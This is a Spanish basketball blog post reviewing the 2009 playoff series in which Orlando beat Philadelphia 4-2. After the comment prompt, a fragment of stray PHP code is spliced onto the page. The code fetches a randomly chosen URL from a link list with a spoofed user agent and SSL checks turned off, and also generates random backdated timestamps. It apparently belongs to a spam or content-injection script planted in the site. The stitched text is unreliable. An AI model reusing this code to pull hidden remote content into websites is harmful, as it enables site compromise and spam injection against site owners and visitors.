Magic 4 – Sixers 2: Supermán no está solo.

02 de May de 2009 por TheDeerHunter

Un pronóstico más que clavamos… y este no era tan sencillo de acertar de forma exacta. Sí, diréis, Orlando  (sin Nelson, no lo olvidemos) tiene mejor plantilla que los Sixers sin Brand. Pero dos semanas atrás, sin estar claro el concurso de Turkoglu y Rashard Lewis no había mucha gente que se fuera a jugar el sueldo de un mes a que pasaban los Magic. Vayamos por partes.La serie ha tenido un marcado tono de menos a más por parte de Orlando, en función de cómo se han ido reinsertando sus jugadores. Estaba claro que, de lograr recuperarlos, el tiempo jugaba en favor de los Magic. La serie ha pasado del triple fallado por Turkoglu en el primero, el milagro de partido de Courtney Lee en el segundo (otro que ha caído, por cierto), el canastón de Young ante Howard en el tercero y el triple, cómo no, de Turkoglu en el cuarto que prácticamente mató la eliminatoria.

Los Sixers hubieran tenido sus opciones… una posibilidad remota de llevarse el 1-3 tempranero para después jugar con la ansiedad del rival a priori favorito. Pero es que no han jugado bien. Sólo André Miller e Iguadala han mejorado sus números de la regular. Todos los demás los han empeorado significativamente. Como mucho podríamos apuntar el gran éxito de Dalembert de lograr sacar de sus casillas a Dwight Howard, como mérito también es no haber acabado en la UCI. De muy poco le sirvió el piñazo. Lo dicho, 10 puntos menos de media resulta significativo y de los puntos recibidos no tenemos claro cuánto ha sido producto de la defensa en sí y cuánto a causa de los problemas físicos de los Magic.

Demasiado poco contra un equipo que tiene un pilar maestro del tamaño de Dwight Howard que es bien capaz de mantener a cualquier equipo a flote en los momentos de máxima dificultad. Pero es que además, más allá de los vaivenes, al final Orlando ha terminado demostrando que el fondo de armario que apuntaba en la regular no era ningún espejismo. Desde un Rafer Alston como un reloj (a su nivel, pero haciendo lo que sabe, que no es poco) a los Pietrus, Redick y Gortat que han brillado sobremanera en las ausencias de los titulares. Grandes y agradables sorpresas que compensan en cierto modo la pérdida importantísima de Lee. El precio que se ha de pagar por llegar a una segunda ronda, pero el banquillo de Orlando sí ha sido decisivo.

Por parte de los Sixers el futuro queda un tanto en punto muerto. El jarro de agua fría llamado Brand ha significado un golpe muy gordo y, aunque la temporada en sí no ha sido mala no se puede evitar un regusto decepcionante. Primera consecuencia: los rumores de que André Miller no desea renovar. No será nada fácil encontrarle sustituto en un equipo que pretende seguir creciendo.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>